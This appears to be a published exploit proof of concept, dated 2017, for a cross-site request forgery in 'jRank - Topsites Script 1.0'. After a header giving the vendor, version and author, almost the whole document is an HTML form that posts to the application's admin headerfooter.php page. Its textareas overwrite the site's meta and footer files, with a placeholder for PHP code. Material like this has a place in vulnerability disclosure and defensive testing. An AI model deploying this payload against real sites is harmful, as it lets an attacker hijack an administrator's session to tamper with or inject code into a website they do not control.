1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
<!-- # # # # # # Exploit Title: jRank - Topsites Script 1.0 - Cross-Site Request Forgery # Dork: N/A # Date: 10.09.2017 # Vendor Homepage: https://topsitesscript.com/ # Software Link: https://topsitesscript.com/topsites-script-demo/ # Demo: http://www.topsitesscript.com/demo/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # --> <form action="http://localhost/[PATH]/admin/headerfooter.php" method="post"> <input name="action" value="edit" type="hidden"> <table width="95%" cellspacing="1" cellpadding="3" border="0" align="center"> <tbody> <tr bgcolor="#3498DB"> <td><b style="color:#FFFFFF;">Meta Tags File</b></td> </tr> <tr bgcolor="#FFFFFF"> <td> <textarea cols="10" rows="2" name="meta" style="width: 100%"> <!-- Html Code etc..... --> </textarea> </td> </tr> </tbody> </table> <table width="95%" cellspacing="1" cellpadding="3" border="0" align="center"> <tbody> <tr bgcolor="#3498DB"> <td><b style="color:#FFFFFF;">Footer File</b></td> </tr> <tr bgcolor="#FFFFFF"> <td><textarea cols="60" rows="7" name="footer" style="width: 100%"> <!-- Php Code etc..... --> </textarea> </td> </tr> <tr bgcolor="#FFFFFF"> <td> <font face="verdana" size="2"><center><input name="submit" value="Edit" type="submit"></center></font> </td> </tr> </tbody> </table> </form> |